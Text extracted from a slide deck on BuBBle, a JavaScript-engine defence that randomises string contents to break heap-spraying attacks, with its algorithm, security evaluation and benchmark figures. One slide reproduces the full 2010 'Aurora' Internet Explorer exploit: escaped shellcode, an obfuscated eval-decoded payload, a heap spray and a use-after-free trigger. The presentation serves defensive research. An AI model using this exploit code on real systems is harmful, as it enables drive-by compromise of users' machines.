![Page 26: BuBBle: a Javascript engine level countermeasure against heap-spraying attacks](https://reader034.fdocuments.in/reader034/viewer/2022051314/5575c36fd8b42a312a8b4b9c/html5/thumbnails/26.jpg)
rand <- generate_random_position(0,MINLEN)
len <- string.length()
intervals <- len/MINLEN
foreach (i in intervals)
pos = MINLEN*i
save_position(pos+rand)save_value(character[pos+rand])
change_value(character[pos + rand])
BuBBle approach: js_Transform()
128
“blah blah blah is a normal string with appended shellcode”
len = 57
intervals = 2
7 35a w2
“blah bl0xCCh blah is a normal string 0xCCith appended shellcode”
rand <-
![Page 27: BuBBle: a Javascript engine level countermeasure against heap-spraying attacks](https://reader034.fdocuments.in/reader034/viewer/2022051314/5575c36fd8b42a312a8b4b9c/html5/thumbnails/27.jpg)
rand <- generate_random_position(0,MINLEN)
len <- string.length()
intervals <- len/MINLEN
foreach (i in intervals)
pos = MINLEN*i
save_position(pos+rand)save_value(character[pos+rand])
change_value(character[pos + rand])
BuBBle approach: js_Transform()
128
“blah blah blah is a normal string with appended shellcode”
len = 57
intervals = 2
7 35a w2
“blah bl0xCCh blah is a normal string 0xCCith appended shellcode”
rand <-
![Page 28: BuBBle: a Javascript engine level countermeasure against heap-spraying attacks](https://reader034.fdocuments.in/reader034/viewer/2022051314/5575c36fd8b42a312a8b4b9c/html5/thumbnails/28.jpg)
rand <- generate_random_position(0,MINLEN)
len <- string.length()
intervals <- len/MINLEN
foreach (i in intervals)
pos = MINLEN*i
save_position(pos+rand)save_value(character[pos+rand])
change_value(character[pos + rand])
BuBBle approach: js_Transform()
128
“blah blah blah is a normal string with appended shellcode”
len = 57
intervals = 2
7 35a w2
“blah bl0xCCh blah is a normal string 0xCCith appended shellcode”
rand <-
![Page 29: BuBBle: a Javascript engine level countermeasure against heap-spraying attacks](https://reader034.fdocuments.in/reader034/viewer/2022051314/5575c36fd8b42a312a8b4b9c/html5/thumbnails/29.jpg)
rand <- generate_random_position(0,MINLEN)
len <- string.length()
intervals <- len/MINLEN
foreach (i in intervals)
pos = MINLEN*i
save_position(pos+rand)save_value(character[pos+rand])
change_value(character[pos + rand])
BuBBle approach: js_Transform()
128
“blah blah blah is a normal string with appended shellcode”
len = 57
intervals = 2
7 35a w2
“blah bl0xCCh blah is a normal string 0xCCith appended shellcode”
rand <-
![Page 30: BuBBle: a Javascript engine level countermeasure against heap-spraying attacks](https://reader034.fdocuments.in/reader034/viewer/2022051314/5575c36fd8b42a312a8b4b9c/html5/thumbnails/30.jpg)
rand <- generate_random_position(0,MINLEN)
len <- string.length()
intervals <- len/MINLEN
foreach (i in intervals)
pos = MINLEN*i
save_position(pos+rand)save_value(character[pos+rand])
change_value(character[pos + rand])
BuBBle approach: js_Transform()
128
“blah blah blah is a normal string with appended shellcode”
len = 57
intervals = 2
7 35a w2
“blah bl0xCCh blah is a normal string 0xCCith appended shellcode”
rand <-
![Page 31: BuBBle: a Javascript engine level countermeasure against heap-spraying attacks](https://reader034.fdocuments.in/reader034/viewer/2022051314/5575c36fd8b42a312a8b4b9c/html5/thumbnails/31.jpg)
BuBBle approach: security evaluation
• What? We still spray the heap!
• Interrupt procedure call
(.byte 0xcc)
• IE and Aurora against Google (Jan 2010)
![Page 32: BuBBle: a Javascript engine level countermeasure against heap-spraying attacks](https://reader034.fdocuments.in/reader034/viewer/2022051314/5575c36fd8b42a312a8b4b9c/html5/thumbnails/32.jpg)
Aurora-‐Google (1-‐0)<html><script>var sc = unescape("
%u9090%u19ebu4b5bu3390%u90c9%u7b80%ue901%u0175%u66c3%u7bb9%u8004%u0b34%ue2d8%uebfaue805%uffe2%uffffu3931%ud8dbu87d8%u79bcud8e8%ud8d8%u9853%u53d4%uc4a8%u5375%ud0b0%u2f53%ud7b2%u3081%udb59%ud8d8%u3a48%ub020%ueaebud8d8%u8db0%ubdabu8caau9e53%u30d4%uda37%ud8d8%u3053%ud9b2%u3081%udbb9%ud8d8%u213aub7b0%ud8b6%ub0d8%uaaadub5b4%u538cud49eu0830%ud8dau53d8%ub230%u81d9%u9a30%ud8dbu3ad8%ub021%uebb4%ud8eauabb0%ubdb0%u8cb4%u9e53%u30d4%uda69%ud8d8%u3053%ud9b2%u3081%udbfbud8d8%u213au3459%ud9d8%ud8d8%u0453%u1b59%ud858%ud8d8%ud8b2%uc2b2%ub28bu27d8%u9c8eu18ebu5898%udbe4%uadd8%u5121%u485eud8d8%u1fd8%udbdcub984%ubdf6%u9c1fudcdbubda0%ud8d8%u11ebu8989%u8f8bueb89%u5318%u989eu8630%ud8dau5bd8%ud820%u5dd7%ud9a7%ud8d8%ud8b2%ud8b2%udbb2%ud8b2%udab2%ud8b0%ud8d8%u8b18%u9e53%u30fcudae5%ud8d8%u205bud727%u865cud8d9%u51d8%ub89eud8b2%u2788%uf08eu9e51%u3bcu485eud8d8%u1fd8%udbdcuba84%ubdf6%u9c1fudcdbubda0%ud8d8%ud8b2%ud8b2%udab2%ud8b2%ud8b2%ud8b0%ud8d8%u8b98%u9e53%u30fcud923%ud8d8%u205bud727%uc45cud8d9%u51d8%u5c5eud8d8%u51d8%u5446%ud8d8%u53d8%ub89eud8b2%ud8b2%ud8b2%u9e53%u88b8%u8e27%u1fe0%ua89eud8d8%ud8d8%u9e1fud8acud8d8%u59d8%ud81fud8dauebd8%u5303%uc86%ud8b2%u9e55%u88a8%ud8b0%ud8dcu8fd8%uae27%u27b8%udc8eu11ebud861%ud8dcu58d8%ud7a4%u4d27%ud4acua458%u27d7%uacd8%u58ddud7acu4d27%u333au1b53%ud8f5%ud8dcu5bd8%ud820%udba7%u8651%ub2a8%u55d8%uac9eu2788%ua8aeu278fu5c6eud8d8%u27d8%ue88eu3359%udcd8%ud8d8%u235bua7d8%u277dub8aeu8e27%u27ecu5c6eud8d8%u27d8%uec8eu5e53%ud848%ud8d8%u4653%ud854%ud8d8%udc1fu84dbuf6b9%u8bbdu8e27%u53f4%u5466%ud8d8%u53d8%u485eud8d8%u1fd8%udfdcuba84%ubdf6%u3459%ud9d8%ud8d8%u0453%ud8b0%ud8d9%u8bd8%ud8b0%ud8d9%u8fd8%ud8b2%ud8b2%u8e27%u53c4%ueb23%ueb18%u5903%ud834%ud8dau53d8%u5b14%u8c20%ud0a5%uc451%u5bd9%udc18%u2b33%u1453%u0153%u1b5buebc8%u8818%u8b89%u8888%u8888%u8888%u888fu5388%ud09eu2f30%ud8d8%u53d8%ue4a6%uec30%ud8d9%u30d8%ud8efud8d8%ubbb0%uafaeub0d8%ub0abub7bcu538cud49eu6e30%ud8d8%u51d8%ue49eu79bcud8dcud8d8%u7855%u27b8%u2727%ubdb2%uae27%u53e4%uc89eu4230%ud8d8%uebd8%u8b03%u8b8bu278bu3008%ud83dud8d8%u3459%ud9d8%ud8d8%u2453%u1f5bu1fdcueadfu49acu1fd4%udc9fu51bbu9709%u9f1fu78d0%u4fbdu1f13%ud49fu9889%ua762%u9f1fue6c8%u6ec5%u1fe1%ucc9fub160%uc30cu9f1fu66c0%ubea7%u1f78%uc49fu7124%u75efu9f1fu40f8%uc8d2%ubc20%ue879%ud8d8%u53d8%ud498%ua853%u75c4%ub053%u53d0%u512fubc8eudcb2%u3081%ud87bud8d8%u3a48%ub020%ueaebud8d8%u8db0%ubdabu8caaude53%uca30%ud8d8%u53d8%ub230%u81ddu5c30%ud8d8%u3ad8%ueb21%u8f27%u8e27%u58dcu30e0%ue058%uad31%u59c9%udda0%u4848%u4848%ud0acu2753%u538du5534%udd98%u3827%ue030%ud8d8%u1bd8%ue058%u5830%u31e0%uc9adua059%u48ddu4848%uac48%ub03fud2d0%ud8d8%u9855%u27ddu3038%ud8cfud8d8%u301bud8c9%ud8d8%uc960%udcd9%u1a58%ud8d4%uda33%u1b80%u2130%u2727%u8327%udf1eu5160%ud987%u1fbeudd9fu3827%u8b1bu0453%ub28bub098%uc8d8%ud8d8%u538fuf89eu5e30%u2727%u8027%u891bu538eue4aduac53%ua0f6%u2ddbu538euf8aeu2ddbu11ebu9991%udb75%ueb1dud703%uc866%u0ee2%ud0acu1319%udbdfu9802%u2933%uc7e3%u3fadu5386%ufc86%u05dbu53beu93d4%u8653%udbc4%u5305%u53dcu1ddbu8673%u1b81%uc230%u2724%u6a27%u3a2au6a2cud7eeu28cbua390%ueae5%u49acu5dd4%u7707%ubb63%u0951%u8997%u6298%udfa7%ufa4auc6a8%ubc7cu4b37%u3ceau564cud2cbua174%u3ee1%u1c40%uc755%u8faud5beu9b27%u7466%u4003%uc8d2%u5820%u770eu2342%ucd8bub0beuacacue2a8%uf7f7%ubdbcub7b5%uf6e9%uacbeub9a8%ubbbbuabbduf6abubbbbubcf7%ub5bd%uf7b7%ubcb9%ub2f6%ubfa8%u00d8");
var sss = Array(826, 679, 798, 224, 770, 427, 819, 770, 707, 805, 693, 679, 784, 707, 280, 238, 259, 819, 336, 693, 336, 700, 259, 819, 336, 693, 336, 700, 238, 287, 413, 224, 833, 728, 735, 756, 707, 280, 770, 322, 756, 707, 770, 721, 812, 728, 420, 427, 371, 350, 364, 350, 392, 392, 287, 224, 770, 301, 427, 770, 413, 224, 770, 427, 770, 322, 805, 819, 686, 805, 812, 798, 735, 770, 721, 280, 336, 448, 371, 350, 364, 350, 378, 399, 315, 805, 693, 322, 756, 707, 770, 721, 812, 728, 287, 413, 826, 679, 798, 224, 840, 427, 770, 707, 833, 224, 455, 798, 798, 679, 847, 280, 287, 413, 224, 714, 777, 798, 280, 826, 679, 798, 224, 735, 427, 336, 413, 735, 420, 350, 336, 336, 413, 735, 301, 301, 287, 224, 861, 840, 637, 735, 651, 427, 770, 301, 805, 693, 413, 875);var arr = new Array;
for (var i = 0; i < sss.length; i ++ ){ arr[i] = String.fromCharCode(sss[i]/7); } var cc=arr.toString();cc=cc.replace(/ ,/ g, "" ); cc = cc.replace(/@/g, ","); eval(cc);
var x1 = new Array(); for (i = 0; i < 200; i ++ ){ x1[i] = document.createElement("COMMENT"); x1[i].data = "abc"; } ; var e1 = null; function ev1(evt){ e1 = document.createEventObject(evt); document.getElementById("sp1").innerHTML = ""; window.setInterval(ev2, 50); } function ev2(){ p = "\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0du0c0du0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d"; for (i = 0; i < x1.length; i ++ ){ x1[i].data = p; } ; var t = e1.srcElement; }</script><span id="sp1"><IMG SRC="aaa.gif" onload="ev1(event)"></span></body></html>
![Page 33: BuBBle: a Javascript engine level countermeasure against heap-spraying attacks](https://reader034.fdocuments.in/reader034/viewer/2022051314/5575c36fd8b42a312a8b4b9c/html5/thumbnails/33.jpg)
BuBBle: performance benchmarks
• Macrobenchmarks
• Sunspider Benchmark Suite
• V8
• PeaceKeeper bench.
• Memory overhead analysis
![Page 34: BuBBle: a Javascript engine level countermeasure against heap-spraying attacks](https://reader034.fdocuments.in/reader034/viewer/2022051314/5575c36fd8b42a312a8b4b9c/html5/thumbnails/34.jpg)
Test Perf.Overhead
3d 0.17%
bitops 0.89%
controlflow 1.44%
math 0.62%
regexp 0.23%
string base64 27.3%
fasta 1.24%
tagcloud 2.20%
unpack 3.24%
validate 9.30%
Average 5.19%
Benchmark Perf. Overhead
Rendering 0.5%
Social Networking 0.5%
Complex Graphics 2.2%
Data 14%
DOM ops. 0.2%
Text parsing 2.0%
Total 2.8%
Peacekeeper Javascript BenchmarksSunspider Javascript Benchmark Suite
Site URL Perf. overhead
economist.com 5.6%
amazon.com 4.7%ebay.com 4.2%
facebook.com 4.9%
maps.google.com 3.2%
docs.google.com 6.3%
cnn.com 4.8%
youtube.com 4.9%
Average 4.8%
Macrobenchmarks
Benchmark Perf. Overhead
Richards 5.6%
DeltaBlue 3.6%
Crypto 10%
Ray Trace 1.5%
Early Boyer 3.7%
RegExp 0.6%
Splay 1.8%
Total 2.6%
V8 Javascript Benchmarks
![Page 35: BuBBle: a Javascript engine level countermeasure against heap-spraying attacks](https://reader034.fdocuments.in/reader034/viewer/2022051314/5575c36fd8b42a312a8b4b9c/html5/thumbnails/35.jpg)
BuBBle: memory overhead
• 1/24 changes
• n-‐byte original string
• i = n/24
• support data structure 2i bytes long
• 8.3% memory overhead (theoretical and room for improvement)
![Page 36: BuBBle: a Javascript engine level countermeasure against heap-spraying attacks](https://reader034.fdocuments.in/reader034/viewer/2022051314/5575c36fd8b42a312a8b4b9c/html5/thumbnails/36.jpg)
BuBBle: memory overhead
• 1/24 changes
• n-‐byte original string
• i = n/24
• support data structure 2i bytes long
• 8.3% memory overhead (theoretical and room for improvement)
Benchmark Mem. Overhead
Sunspider 5.6%
V8 4.2%
Peacekeeper 6.5%
Average 5.3%Memory overhead analysis from proc file system
![Page 37: BuBBle: a Javascript engine level countermeasure against heap-spraying attacks](https://reader034.fdocuments.in/reader034/viewer/2022051314/5575c36fd8b42a312a8b4b9c/html5/thumbnails/37.jpg)
Related work• ASLR
Bhatkar, S., Duvarney, D.C., Sekar, R.: Address obfuscation: An efficient approach to combat a broad range of memory error exploits. Proceedings of the 12th USENIX Security Symposium, Washington, D.C., U.S.A., August 2003
• DEPData Execution Prevention: Windows Server 2003 with SP1
• Nozzle
Ratanaworabhan, P., Livshits, B., Zorn, B.: Nozzle: A defense against heap-spraying code injection attacks. Technical report, Microsoft Research (November 2008)
• Shellcode detection
Egele,M.,Wurzinger,P.,Kruegel,C.,Kirda,E.:Defending browsers against drive-by downloads: mitigating heap-spraying code injection attacks. In: Flegel, U., Bruschi, D. (eds.) Detection of Intrusions and Malware, and Vulnerability Assessment. LNCS, vol. 5587, pp. 88– 106. Springer, Heidelberg (2009)
![Page 38: BuBBle: a Javascript engine level countermeasure against heap-spraying attacks](https://reader034.fdocuments.in/reader034/viewer/2022051314/5575c36fd8b42a312a8b4b9c/html5/thumbnails/38.jpg)
Conclusion• Lightweight solution(e.g. Mozilla Firefox, Mozilla Fennec)
• Implemented for Javascript strings
• Allocation of malicious objects from external media
(mp3, ... )
• Future dev: protect arrays of integers, protect other engines
• Not just for browsers
![Page 39: BuBBle: a Javascript engine level countermeasure against heap-spraying attacks](https://reader034.fdocuments.in/reader034/viewer/2022051314/5575c36fd8b42a312a8b4b9c/html5/thumbnails/39.jpg)
![Page 40: BuBBle: a Javascript engine level countermeasure against heap-spraying attacks](https://reader034.fdocuments.in/reader034/viewer/2022051314/5575c36fd8b42a312a8b4b9c/html5/thumbnails/40.jpg)
?